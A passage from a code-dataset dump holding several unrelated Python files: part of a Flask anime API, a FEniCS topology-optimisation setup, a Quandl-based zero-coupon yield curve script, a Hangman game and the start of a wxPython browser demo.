resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n def put(self, idx):\n \"\"\"Update a specific anime\"\"\"\n old_value = {\n \"old\": str(get_item(model=model, idx=idx))\n }\n update_value = request.args.get('anime')\n status = update_item_in_table(\n model=model, idx=idx, value=update_value\n )\n if status == 1:\n new_value = {\n \"new\": str(get_item(model=model, idx=idx))\n }\n data = {\n \"anime_id\": idx,\n \"title\": [old_value, new_value]\n }\n else:\n # TODO - handle the failed update status\n pass\n if data is None:\n resp = render_template('error_message.html')\n else:\n resp = Response(\n response=json.dumps(data),\n status=200,\n mimetype=\"application/json\"\n )\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n\n def delete(self, idx):\n \"\"\"Delete a specific anime\"\"\"\n data = delete_item(model=model, idx=idx)\n if data is None:\n resp = render_template('error_message.html')\n else:\n data = {\n \"anime_id\": idx,\n \"title\": str(data)\n }\n resp = Response(\n response=json.dumps(data),\n status=200,\n mimetype=\"application/json\"\n )\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n\n@ns_anime.route('//')\n@ns_anime.response(404, 'Anime not found')\n@ns_anime.param('idx', 'Anime identifier')\n@ns_anime.param('rng', 'Range of values')\nclass BulkAnime(Resource):\n \"\"\"Bulk anime item operations - GET, DELETE\"\"\"\n\n def get(self, idx, rng):\n \"\"\"Get a `rng` list of animes starting from id:`idx`\"\"\"\n items = get_items_from_index(model=model, idx=idx, rng=rng)\n anime_list = []\n for index, item in enumerate(items, idx):\n new_anime = {\n \"anime_id\": index,\n \"title\": str(item)\n }\n anime_list.append(new_anime)\n resp = Response(\n response=json.dumps(anime_list),\n status=200,\n mimetype=\"application/json\"\n )\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n def delete(self, idx, rng):\n \"\"\"Delete a `rng` list of animes starting from id:`idx`\"\"\"\n items = delete_items_from_index(model=model, idx=idx, rng=rng)\n delete_list = []\n for index, item in enumerate(items, idx):\n new_anime = {\n \"anime_id\": index,\n \"title\": str(item)\n }\n delete_list.append(new_anime)\n resp = Response(\n response=json.dumps(delete_list),\n status=200,\n mimetype=\"application/json\"\n )\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n\n@ns_anime.route('/upload')\n@ns_anime.response(404, 'Anime not found')\nclass UploadAnime(Resource):\n \"\"\"Upload anime data to database\"\"\"\n\n def post(self):\n \"\"\"Upload list of animes using csv data\"\"\"\n if request.files:\n uploaded_file = request.files['file']\n df = pd.read_csv(uploaded_file, header=0)\n for _, item in df.iterrows():\n add_item(model=model, anime_id=item['anime_id'], title=item['title'])\n resp = Response(\n response=json.dumps({\"status\": \"Added\"}),\n status=200,\n mimetype=\"application/json\"\n )\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=4996, debug=False)\n","repo_name":"aashish-chaubey/scaling-lamp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"42257148619","text":"from fenics import *\nfrom mshr import *\nimport scipy.stats as stats\nfrom distributions.karhunen_loeve_dist import *\nfrom distributions.random_rotation import *\n\n\ndef bridge2Dstochastic():\n resolution = 30\n upperEnd = 1.0\n lowerEnd = 0.0\n leftEnd = -1.0\n rightEnd = 1.0\n dirichletSize = 0.1\n neumannSize = 0.02\n\n\n class GammaD(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and near(x[1], 0) and (leftEnd <= x[0] <= (leftEnd + dirichletSize))\n\n class GammaS(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and near(x[1], 0) and ((rightEnd - dirichletSize) <= x[0] <= rightEnd)\n\n class GammaG(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and near(x[1], 0) and -neumannSize <= x[0] <= neumannSize\n\n domain = (Rectangle(Point(leftEnd, lowerEnd), Point(leftEnd + dirichletSize, upperEnd))\n + Rectangle(Point(leftEnd + dirichletSize, lowerEnd), Point(-neumannSize, upperEnd))\n + Rectangle(Point(-neumannSize, lowerEnd), Point(neumannSize, upperEnd))\n + Rectangle(Point(neumannSize, lowerEnd), Point(rightEnd - dirichletSize, upperEnd))\n + Rectangle(Point(rightEnd - dirichletSize, lowerEnd), Point(rightEnd, upperEnd))\n )\n\n mesh = generate_mesh(domain, resolution)\n\n #mesh = RectangleMesh(Point(-1.0, 0.0), Point(1.0, 1.0), 50, 25, \"right/left\")\n\n kl_field = KLdist(mesh, distType='lognormal', nModes=10, cov_lenght=0.1, cov_scal=1, kappaMean=150, kappaScale=100)\n g_field = rotationdist(distType='normal_trunc', scale=0.3, mean=0, kappaMean=(0,-5000))\n\n\n parameter = {\"mesh\": mesh,\n \"stochastic\": False,\n \"CVaR\": False,\n \"RandomVariables\": [([\"g\"], g_field), ([\"mu\", \"lmbda\"], kl_field)],\n \"g\": Constant((0, -5000)),\n \"phi_0\": Constant(0.5),\n \"gammaD\": GammaD(),\n \"gammaG\": GammaG(),\n \"gammaS\": GammaS(),\n \"SDir\": 1,\n \"lmbda\": Constant(150),\n \"mu\": Constant(150),\n \"m\": Constant(0.4),\n \"dim\": 2,\n \"nSamples\": 224,\n \"gamma\": Constant(1),\n \"gammaAdaptFactor\": Constant(0.01), # 0.1 for Beta > 0\n \"epsilon\": Constant(1. / 16),\n \"beta\": Constant(0)\n }\n return parameter","repo_name":"MarvinHaa/DeepNNforTopoOptisation","sub_path":"problems/bridge2Dstochastic.py","file_name":"bridge2Dstochastic.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"28942331713","text":"#!/usr/bin/env python\n\"\"\"\nAuthor: Ethan Ho\nDate: 3/2/2023\nLicense: MIT\nUsage:\n\npython3 final_proj.py\n# or from Python3: from final_proj import main as final_proj_main\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport json\nimport math\nfrom typing import List, Dict, Tuple, Optional\nimport functools\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import norm, probplot\nimport quandl\nimport plotly.express as px\ntry:\n from memoize.dataframe import memoize_df\nexcept ImportError as err:\n print(str(err))\n raise Exception(\n f\"Missing dependency memoize. Please install using pip:\\n\\n\"\n f\"pip install git+https://github.com/ethho/memoize.git\"\n )\ntry:\n from lmfit.models import SkewedGaussianModel\nexcept ImportError as err:\n print(str(err))\n raise Exception(\n f\"Missing dependency memoize. Please install using pip:\\n\\n\"\n f\"pip install lmfit\"\n )\n\nTENOR_WEEK_MAP = {\n (1, 'm'): 4,\n (2, 'm'): 8,\n (3, 'm'): 13,\n (4, 'm'): 17,\n (6, 'm'): 26,\n (12, 'm'): 52,\n (1, 'y'): 52,\n (2, 'y'): 52 * 2, # 104\n (3, 'y'): 52 * 3, # 156\n (5, 'y'): 52 * 5, # 260\n (7, 'y'): 52 * 7, # 364\n (10, 'y'): 52 * 10, # 520\n (20, 'y'): 52 * 20, # 1040\n (30, 'y'): 52 * 30, # 1560\n}\n\ndef get_secrets(fp='./secrets.json'):\n \"\"\"\n Reads secret values such as API keys from a JSON-formatted file at `fp`.\n \"\"\"\n with open(fp, 'r') as f:\n data = json.load(f)\n return data\n\ndef get_quandl_api_key() -> str:\n \"\"\"\n Returns Quandl API key stored in secrets.json.\n \"\"\"\n secrets = get_secrets()\n key = secrets.get('NASTAQ_DATA_API_KEY')\n assert key, f\"NASTAQ_DATA_API_KEY field in secrets.json is empty or does not exist\"\n return key\n\ndef strip_str_dtypes(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Given a DataFrame, strips values in columns with string or object\n dtype. I noticed that this was an issue when I saw some m_ticker values\n like \"AAPL \" with trailing whitespace.\n \"\"\"\n for col in df.columns:\n if pd.api.types.is_string_dtype(df[col]) or pd.api.types.is_object_dtype(df[col]):\n df[col] = df[col].str.strip()\n return df\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_table(\n name, start_date, end_date, **kw\n) -> pd.DataFrame:\n df = quandl.get_table(\n name,\n date={'gte': start_date, 'lte': end_date},\n api_key=get_quandl_api_key(),\n paginate=True,\n **kw\n )\n df['date'] = pd.to_datetime(df['date'])\n df.sort_values(by='date', inplace=True)\n df.reset_index(inplace=True)\n return df\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_quotemedia_prices(\n start_date, end_date, ticker\n) -> pd.DataFrame:\n return fetch_quandl_table(\n name= 'QUOTEMEDIA/PRICES',\n start_date=start_date,\n end_date=end_date,\n ticker=ticker,\n )\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_yc(\n name, start_date, end_date,\n) -> pd.DataFrame:\n df = quandl.get(\n name,\n start_date=start_date,\n end_date=end_date,\n api_key=get_quandl_api_key(),\n ).reset_index().rename(columns={'Date': 'date'})\n df['date'] = pd.to_datetime(df['date'])\n df.sort_values(by='date', inplace=True)\n return df\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_spot(\n symbol, **kw\n) -> pd.DataFrame:\n df = quandl.get(\n f'CUR/{symbol}',\n **kw\n ).reset_index().rename(columns={\n 'DATE': 'date',\n 'RATE': f'USD/{symbol}',\n })\n df['date'] = pd.to_datetime(df['date'])\n df.sort_values(by='date', inplace=True)\n return df\n\ndef unique_index_keys(df, level=0) -> List[str]:\n return df.index.get_level_values(level=level).unique().tolist()\n\ndef get_next_day_of_week(date, day_of_week: int) -> str:\n \"\"\"\n Monday = 0, Wednesday = 2\n \"\"\"\n as_dt = pd.to_datetime(date)\n days_until = (day_of_week - as_dt.day_of_week) % 7\n out_dt = as_dt + pd.to_timedelta(days_until, 'D')\n return out_dt.strftime('%Y-%m-%d')\n\ndef get_standard_yc_cols(cols: List, col_prefix='') -> Dict:\n out = dict()\n for col_raw in cols:\n col = col_raw.lower()\n col = re.sub(r'-year', 'y', col)\n col = re.sub(r'-month', 'm', col)\n if col_prefix:\n col = col_prefix + '_' + col\n out[col_raw] = col\n return out\n\ndef get_yc(*args, col_prefix='', **kw):\n df = fetch_quandl_yc(*args, **kw)\n df['date'] = pd.to_datetime(df['date'])\n df.set_index('date', inplace=True)\n df.sort_index(inplace=True)\n df.rename(columns=get_standard_yc_cols(df.columns, col_prefix), inplace=True)\n return df\n\n@functools.lru_cache()\ndef get_col_groups(cols) -> Dict:\n \"\"\"\n Usage: get_col_groups(tuple(yc_daily.columns.tolist()))\n \"\"\"\n out = dict()\n for col in cols:\n prefix, tenor_raw = col.split('_')\n tenor, unit = tenor_raw[:-1], tenor_raw[-1]\n if prefix not in out:\n out[prefix] = list()\n item = {\n 'col': col,\n 'country': prefix,\n 'tenor': tenor,\n 'unit': unit\n }\n out[prefix].append(item)\n return out\n\ndef bond_price(zcb, coupon_rate, tenor, coupon_freq):\n \"\"\"\n Copied from Zero_And_Spot_Curves.ipynb\n \"\"\"\n times = np.arange(tenor, 0, step=-coupon_freq)[::-1]\n if times.shape[0] == 0:\n p = 1.0\n else:\n r = np.interp(times, zcb.index.values, zcb.values) # Linear interpolation\n p = np.exp(-tenor*r[-1]) + coupon_freq * coupon_rate * np.exp(-r*times).sum()\n # Any coupon bond can be written as the sum of zero coupon bonds\n return p\n\ndef tenor_wk_to_years(wk: int) -> float:\n \"\"\"\n Convert tenor from weeks to years.\n \"\"\"\n return wk / 52\n # Equivalently,\n # return wk * 7 / 364\n\ndef tenor_years_to_wk(yr: float) -> float:\n \"\"\"\n Convert tenor from years to weeks.\n \"\"\"\n return yr * 52\n # Equivalently,\n # return yr * 364 / 7\n\n\ndef _zcb_from_spot(spot, tenor, cpn_freq, spot_curve):\n \"\"\"\n Calculate ZCB (discount) rate for `tenor` (years) from `spot` rate,\n given 1 / `cpn_freq` coupons are given per year.\n\n Adapted from compute_zcb_curve in Zero_And_Spot_Curves.ipynb.\n \"\"\"\n if tenor <= 1.:\n # US T-bills (<=1 year maturity) have no coupons\n return spot\n times = np.arange(tenor-cpn_freq, 0, step=-cpn_freq)[::-1]\n coupon_half_yr = cpn_freq * spot\n z = np.interp(times, spot_curve.index.values, spot_curve.values)\n preceding_coupons_val = (coupon_half_yr*np.exp(-z*times)).sum()\n return -np.log((1-preceding_coupons_val)/(1+coupon_half_yr))/tenor\n\n\ndef zcb_from_spot(row, cpn_freq, spot_curve, **kw):\n \"\"\"\n Wrapper around _zcb_from_spot. Used in pd.DataFrame.apply.\n \"\"\"\n tenor = row.name # in years\n spot = row.spot\n return _zcb_from_spot(spot, tenor, cpn_freq, spot_curve)\n\n\ndef pr_from_spot(row, cpn_freq, zcb_curve, holding_period, **kw):\n \"\"\"\n Calculate ZCB (discount) price from `row.spot` rate, given 1 / `cpn_freq`\n coupons are given per year.\n\n Lightweight wrapper around `bond_price` function from\n Zero_And_Spot_Curves.ipynb\n \"\"\"\n tenor = row.name # in years\n spot = row.spot\n\n # For example T = 5 years and S = 5 years - 1 month\n # Note that we can pass `holding_period` = 0 to get pr_t\n T = tenor\n S = T - holding_period\n pr = bond_price(\n zcb_curve,\n # We remove the coupon interest term by setting\n # coupon_freq = 0 iff tenor <=1 (T-bills).\n coupon_rate=spot if tenor > 1. else 0,\n tenor=S,\n coupon_freq=cpn_freq\n )\n # if T == S and not pd.isnull(spot):\n # breakpoint()\n return pr\n\n\ndef get_zcb_curve_at_t(\n spot_wk: pd.Series,\n coupons_per_year=2,\n holding_period=28/364.,\n # Equivalently,\n # holding_period=4/52.,\n):\n \"\"\"\n Given the spot rate `spot_wk` indexed by tenor (in weeks), calculate\n zero coupon rate, zero-coupon factor (price), and forward rate & factor.\n \"\"\"\n cpn_freq = 1 / float(coupons_per_year)\n\n # Arrange spot rates into a DataFrame for easier analysis\n df = pd.DataFrame(\n data={\n 'spot': spot_wk.values,\n },\n # Convert tenor index from weeks into years for below calculations\n index=[tenor_wk_to_years(tenor_wk) for tenor_wk in spot_wk.index],\n )\n\n # Shared kwargs to pass to functions in apply\n kw = dict(\n cpn_freq=cpn_freq,\n spot_curve=df['spot'].copy(),\n )\n\n # Zero-coupon rate\n df['zcb'] = df.apply(zcb_from_spot, axis=1, **kw)\n kw['zcb_curve'] = df['zcb'].copy(deep=True)\n # Zero-coupon bond price at maturity S = tenor - 1 month\n df['pr_s'] = df.apply(pr_from_spot, axis=1, holding_period=holding_period, **kw)\n # Zero-coupon bond price at maturity T = tenor - 0 months\n df['pr_t'] = df.apply(pr_from_spot, axis=1, holding_period=0., **kw)\n # Forward discount factor (F)\n df['fwd_factor'] = df.pr_t / df.pr_s\n # Forward discount rate (f)\n df['fwd'] = -np.log(df['fwd_factor']) / holding_period\n\n # Convert index back from years to weeks\n df.index = pd.Index([tenor_years_to_wk(tenor_yr) for tenor_yr in df.index])\n # Convert to a series with a MultiIndex\n ser = df.stack(dropna=False)\n ser.index.set_names(['tenor_wk', 'metric'], inplace=True)\n return ser\n\ndef get_4wk_value(df: pd.DataFrame, holding_period, **kw):\n # Calculate tenor in years.\n # There should only be one tenor in the input DataFrame `df`.\n tenors_wk = df.index.get_level_values(level=0).unique()\n assert len(tenors_wk), tenors_wk\n tenor_wk = tenors_wk[0]\n tenor = tenor_wk_to_years(tenor_wk)\n\n pr_s = df.loc[tenor_wk, 'pr_s']\n # NOTE: this assumes that the freq == holding_period\n pr_t_old= df.loc[tenor_wk, 'pr_t'].shift(1)#, freq='28D')\n val = pr_s / pr_t_old\n return val\n\ndef calculate_from_spot(\n df_raw,\n holding_period=28/364.,\n # Equivalently,\n # holding_period=4/52.,\n) -> pd.DataFrame:\n \"\"\"\n Calculate zero-coupon metrics (rate, factor, forward rate, etc.)\n given `df_raw`, which contains annualized spot rates in percent.\n\n TODO\n Review holding_period. Namely, 364/28 = 13.0 trades/year. But our actual\n holding_period = 4 weeks = 28 days.\n \"\"\"\n # Get groups by column prefix\n grps: Dict[List[Dict]] = get_col_groups(tuple(df_raw.columns.tolist()))\n zcb_dict = dict()\n for country, cols in grps.items():\n # Convert each tenor into units of weeks\n for item in cols:\n item['tenor_wk'] = TENOR_WEEK_MAP[(int(item['tenor']), item['unit'])]\n df = df_raw.rename(columns={\n item['col']: item['tenor_wk']\n for item in cols\n })\n\n # Since U.S Treasury uses a 365-366 day/year definition for\n # calculating \"annualized rate\",\n # (see https://home.treasury.gov/policy-issues/financing-the-government/interest-rate-statistics/interest-rates-frequently-asked-questions)\n # convert rates into our definition, which is a 364-day\n # year (7 days * 52.0 weeks = 364 days).\n df *= 364 / 365.2\n\n # Compute ZCB rates, factors, and forward rate & factor at each time t\n zcb = (df / 100.).apply(get_zcb_curve_at_t, axis=1)\n\n # Double-check that TimeDelta between DatetimeIndex values equals\n # holding_period = 28 days\n idx_timedelta = pd.Series(zcb.index.values - np.roll(zcb.index.values, shift=1)).iloc[1:]\n assert pd.to_timedelta(idx_timedelta.unique()[0]).days == 28, idx_timedelta.unique()\n\n # Calculate value at each tenor, assuming that we\n # bought the bond and held for `holding_period` before selling.\n val_df = (\n zcb\n .stack(0, dropna=False)\n [['pr_s', 'pr_t']]\n .swaplevel()\n .sort_index()\n .groupby(level=0, group_keys=False)\n .apply(get_4wk_value, axis=1, holding_period=holding_period)\n .T\n )\n val_df.columns = pd.MultiIndex.from_tuples([\n (tenor_wk, 'val') for tenor_wk in val_df.columns\n ], names=['tenor_wk', 'metric'])\n\n # Merge 1-month value `val` into the DataFrame\n zcb = zcb.merge(val_df, how='left', left_index=True, right_index=True)\n\n # Final tweaks to indices\n zcb.columns.set_names(['tenor_wk', 'metric'], inplace=True)\n zcb.index.set_names(['date'], inplace=True)\n zcb.sort_index(axis=0, inplace=True)\n zcb.sort_index(axis=1, inplace=True)\n assert (zcb.dtypes == np.float64).all(), f\"some columns have dtype != np.float64\"\n\n # Replace non-sensical values with NaN\n # For example, the 1-month forward rate of 1-month T-bills\n zcb.loc[:, (4.0, 'fwd')] = float('nan')\n\n zcb_dict[country] = zcb\n return zcb_dict\n\ndef unstack_zcb_df(in_df):\n df = in_df.copy()\n idx_df = pd.DataFrame(df.columns.str.split('_').tolist(), columns=['tenor', 'figure'])\n idx_df.tenor = idx_df.tenor.astype(float)\n idx_df.replace(0.08, 7/364., inplace=True)\n idx = pd.MultiIndex.from_frame(idx_df)\n df.columns = idx\n df = df.unstack().reorder_levels([1, 2, 0])\n return df\n\ndef read_uszcb(\n zcb_out_fp='./data/uszcb.csv',\n):\n \"\"\"\n Example of how to load DataFrame from uszcb.csv.\n \"\"\"\n df = pd.read_csv(\n zcb_out_fp,\n header=[0, 1],\n index_col=0,\n parse_dates=[0],\n dtype=float\n )\n df.columns = pd.MultiIndex.from_tuples([\n (int(float(tenor)), str(metric)) for tenor, metric in df.columns]\n )\n return df\n\ndef main(\n zcb_out_fp='./data/final_proj/uszcb.csv',\n):\n start_date = '1990-01-01'\n end_date = '2022-12-16'\n\n # Construct a DatetimeIndex containing dates to trade on.\n # We choose to trade every 4 weeks, since this is the tenor of\n # the 1-month T-bill that we will use for funding.\n # We choose every 4th Wednesday to trade on.\n daily_idx = pd.date_range(start_date, end_date)\n first_wed = get_next_day_of_week(start_date, 2)\n wed_idx_w_holidays = pd.date_range(first_wed, end_date, freq='28D')\n assert all(date.day_of_week == 2 for date in wed_idx_w_holidays)\n\n wed_idx = pd.to_datetime([\n date for date in wed_idx_w_holidays\n # if date not in pd.to_datetime([\n # # Remove Wednesdays that fall on holidays\n # '2012-12-26', '2013-12-25', '2014-01-01', '2018-12-26',\n # '2019-12-25', '2020-01-01',\n # ])\n ])\n # assert len(wed_idx_w_holidays) > len(wed_idx)\n\n # Fetch Quandl yield curve (YC) data for each country\n countries = {\n 'USA': 'USD',\n }\n yc_dict = {\n country: (\n get_yc(f'YC/{country}', start_date=start_date, end_date=end_date, col_prefix=country.lower())\n .reindex(daily_idx)\n .fillna(method='ffill')\n .iloc[1:, :]\n ) for country in countries.keys()\n }\n yc_daily = pd.concat(yc_dict.values(), axis=1)\n yc_monthly = yc_daily.loc[wed_idx].copy()\n # yc_monthly = yc_monthly.loc['2001-01-01':].copy() # DEBUG\n zcb_all_countries = calculate_from_spot(yc_monthly)\n df = zcb_all_countries['usa']\n df.to_csv(zcb_out_fp)\n print(f'Wrote US ZCB rates to {zcb_out_fp}')\n\n return df\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])","repo_name":"samhtyler/finm-33150","sub_path":"final_proj.py","file_name":"final_proj.py","file_ext":"py","file_size_in_byte":15446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1383618049","text":"import random\nimport string\n\nWORDLIST_FILENAME = \"words.txt\"\n\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\ndef choose_word(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n \n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\nwordlist = load_words()\n\ndef input_check (guess, letters_guessed):\n '''\n Input: guess, letters_guessed\n Check guess is a letter, is a vowel, is already guessed\n If not yet guessed, add to letters_guessed list\n Return: is_alpha, is_vowel, already_guessed, letters_guessed\n '''\n is_vowel = None\n already_guessed = None\n if str.isalpha(guess) == True: ### Check whether guess is a letter ###\n is_alpha = True\n if len (letters_guessed) > 0:\n if guess in letters_guessed:\n already_guessed = True\n if guess not in letters_guessed:\n letters_guessed.append(guess)\n already_guessed = False\n if len(letters_guessed) == 0:\n letters_guessed.append(guess)\n already_guessed = False\n if guess in 'aeiou': ### Check whether guess is a vowel ###\n is_vowel = True\n if guess not in 'aeiou':\n is_vowel = False\n if str.isalpha(guess) == False:\n is_alpha = False\n return is_alpha, is_vowel, already_guessed, letters_guessed\n\ndef get_guessed_word(secret_word, letters_guessed):\n '''\n secret_word: string, the word the user is guessing\n letters_guessed: list (of letters), which letters have been guessed so far\n returns: string, comprised of letters, underscores (_), and spaces that represents\n which letters in secret_word have been guessed so far.\n '''\n guessed_word = ''\n for i in range(len(secret_word)):\n if secret_word[i] not in letters_guessed:\n guessed_word += '_ '\n else:\n guessed_word += secret_word[i]\n return guessed_word\n\ndef get_available_letters(letters_guessed):\n '''\n letters_guessed: list (of letters), which letters have been guessed so far\n returns: string (of letters), comprised of letters that represents which letters have not\n yet been guessed.\n '''\n lowercase = string.ascii_lowercase\n available_letters = ''\n for i in lowercase:\n if i not in letters_guessed:\n available_letters += i\n return available_letters\n \ndef unique_letter (secret_word):\n '''\n Input: secret_word\n Return: number of unique letters, unique letters list\n '''\n number_unique = 0\n unique = []\n for i in string.ascii_lowercase:\n if i in secret_word:\n number_unique += 1\n unique.append(i)\n return number_unique, unique\n\ndef remaining (is_alpha, is_vowel, already_guessed, guessed_word, remaining_guesses, remaining_warnings, guess, secret_word):\n '''\n Calculate remaining guesses and warnings\n '''\n if is_alpha == False:\n if remaining_warnings == 0:\n remaining_guesses -= 1\n if remaining_warnings > 0:\n remaining_warnings -= 1\n if is_alpha == True:\n if already_guessed == True:\n if remaining_warnings == 0:\n remaining_guesses -= 1\n if remaining_warnings > 0:\n remaining_warnings -= 1\n if (is_vowel == True) and (guess not in secret_word) and (already_guessed == False):\n remaining_guesses -= 2\n if (is_vowel == False) and (guess not in secret_word) and (already_guessed == False):\n remaining_guesses -= 1\n return remaining_guesses, remaining_warnings\n\ndef print_statement (remaining_guesses, remaining_warnings, available_letters):\n '''\n Print remaining_guesses, remaining_warnings left; Available_letters\n '''\n if remaining_warnings > 1 and remaining_guesses > 1 :\n print ('You have', remaining_guesses, 'guesses and', remaining_warnings, 'warnings left.\\n')\n if remaining_warnings <= 1 and remaining_guesses > 1:\n print ('You have', remaining_guesses, 'guesses and', remaining_warnings ,'warning left.\\n')\n if remaining_guesses <= 1 and remaining_warnings <= 1:\n print ('You have', remaining_guesses, 'guess and', remaining_warnings ,'warning left.\\n')\n if remaining_guesses <= 1 and remaining_warnings > 1:\n print ('You have', remaining_guesses, 'guess and', remaining_warnings ,'warning left.\\n')\n if remaining_guesses > 0:\n print ('Available letters:', available_letters)\n \ndef print_input_check ( is_alpha, is_vowel, already_guessed, guessed_word, guess, secret_word):\n if is_alpha == False:\n print ('\\nOops! That is not a valid letter.', guessed_word, \"\\n -----------\\n\")\n if already_guessed == True:\n print (\"\\nOops! You've already guessed that letter.\", guessed_word, \"\\n -----------\\n\")\n if guess in secret_word and already_guessed == False :\n print ('\\nGood guess:', guessed_word, \"\\n -----------\\n\")\n if guess not in secret_word and is_alpha == True and already_guessed == False :\n print ('\\nOops! That letter is not in my word.', guessed_word, \"\\n -----------\\n\")\n\ndef is_word_guessed(letters_guessed, unique):\n '''\n secret_word: string, the word the user is guessing; assumes all letters are\n lowercase\n letters_guessed: list (of letters), which letters have been guessed so far;\n assumes that all letters are lowercase\n returns: boolean, True if all the letters of secret_word are in letters_guessed;\n False otherwise\n '''\n if set(unique) <= set(letters_guessed): ### check if secret_word is a subset of letters_guessed ###\n flag = True\n else:\n flag = False\n return flag\n\ndef hangman(secret_word):\n '''\n secret_word: string, the secret word to guess.\n \n Starts up an interactive game of Hangman.\n \n * At the start of the game, let the user know how many \n letters the secret_word contains and how many guesses s/he starts with.\n \n * The user should start with 6 guesses\n\n * Before each round, you should display to the user how many guesses\n s/he has left and the letters that the user has not yet guessed.\n \n * Ask the user to supply one guess per round. Remember to make\n sure that the user puts in a letter!\n \n * The user should receive feedback immediately after each guess \n about whether their guess appears in the computer's word.\n\n * After each guess, you should display to the user the \n partially guessed word so far.\n \n Follows the other limitations detailed in the problem write-up.\n '''\n remaining_guesses = 6\n remaining_warnings = 3\n letters_guessed = []\n number_unique, unique = unique_letter (secret_word)\n \n print ('Welcome to the game Hangman!\\n\\nI am thinking of a word that is', len(secret_word) ,'letters long. \\n -----------')\n print ('You have 6 guesses and 3 warnings left.\\n\\nAvailable letters: abcdefghijklmnopqrstuvwxyz\\n')\n \n \n while remaining_guesses > 0 and is_word_guessed(letters_guessed, unique) == False:\n guess = str.lower (input ('Please guess a letter: ',))\n is_alpha, is_vowel, already_guessed, letters_guessed = input_check (guess, letters_guessed)\n guessed_word = get_guessed_word(secret_word, letters_guessed)\n available_letters = get_available_letters(letters_guessed)\n remaining_guesses, remaining_warnings = remaining (is_alpha, is_vowel, already_guessed, guessed_word, remaining_guesses, remaining_warnings, guess, secret_word)\n print_input_check ( is_alpha, is_vowel, already_guessed, guessed_word, guess, secret_word)\n print_statement (remaining_guesses, remaining_warnings, available_letters)\n\n \n ### Game ends ###\n if remaining_guesses <= 0:\n print ('Sorry, you ran out of guesses. The word was else:', secret_word)\n if is_word_guessed(letters_guessed, unique) == True:\n score = remaining_guesses * number_unique\n print ('Congratulations, you won! \\n Your total score for this game is:', score)\n\n\nif __name__ == \"__main__\":\n # pass\n\n # To test part 2, comment out the pass line above and\n # uncomment the following two lines.\n \n secret_word = choose_word(wordlist)\n hangman(secret_word)\n","repo_name":"binhyc11/MIT-course-6.0001","sub_path":"ps2_Hangman_part 2.py","file_name":"ps2_Hangman_part 2.py","file_ext":"py","file_size_in_byte":8724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5569457015","text":"import wx\nimport wx.lib.agw.aui\nimport webconnect\n\n\nclass MyFrame(wx.Frame):\n\n# def __init__(self, parent, id=-1, title='wx.aui Test', pos=wx.DefaultPosition, size=(800, 600), style=wx.DEFAULT_FRAME_STYLE):\n# wx.Frame.__init__(self, parent, id, title, pos, size, style)\n\n\n\tdef __init__(self, parent, id=-1, title='Gecko test', pos=wx.DefaultPosition, size=(800,600), style=wx.DEFAULT_FRAME_STYLE):\n\t\twx.Frame.__init__(self, parent, id, title, pos, size, style)\n\n#\t\tself._mgr = wx.aui.AuiManager(self)\n\t\tself._mgr = wx.lib.agw.aui.AuiManager(self)\n# create several text controls\n\t\ttoolbar = wx.lib.agw.aui.AuiToolBar(self, -1, wx.DefaultPosition, wx.DefaultSize,\n wx.lib.agw.aui.AUI_TB_DEFAULT_STYLE)\n\n\t\t#m_urlbar = new wxComboBox(toolbar, wxID_URL, wxT(\"\"), wxPoint(0,0), wxSize(850,18));\n\t\t#urlbar = wx.ComboBox(toolbar, -1, pos=(0, 0), size=(850, 18), choices=authors, style=wx.CB_READONLY)\n\t\turlbar = wx.ComboBox(toolbar, -1, pos=(0, 0), size=(850, 18))\n\n\t\t#toolbar->AddControl(m_urlbar, wxT(\"Location\"));\n\t\ttoolbar.AddControl(urlbar,'Location')\n\t\ttoolbar.Realize()\n\t\t\n\t\t#m_browser = new wxWebControl(this, wxID_WEB, wxPoint(0,0), wxSize(800,600));\n\t\tself._browser = webconnect.wxWebControl(self)\n\n\t\t#add pane\n\t\tself._mgr.AddPane(urlbar, wx.TOP, 'Toolbar')\n\t\tself._mgr.AddPane(self._browser, wx.CENTER, 'Browser')\n\t\t# tell the manager to 'commit' all the changes just made\n\t\tself._mgr.Update()\n\t\tself._browser.OpenURI('www.opennet.ru')\n\n#\t\tself.Bind(wx.EVT_CLOSE, self.OnClose)\n\n\napp = wx.App()\nframe = MyFrame(None)\nframe.Show()\napp.MainLoop()\n\n#app = wx.App()\n#frame = wx.Frame(None, -1, 'Pytho Gecko Test')\n#wc = 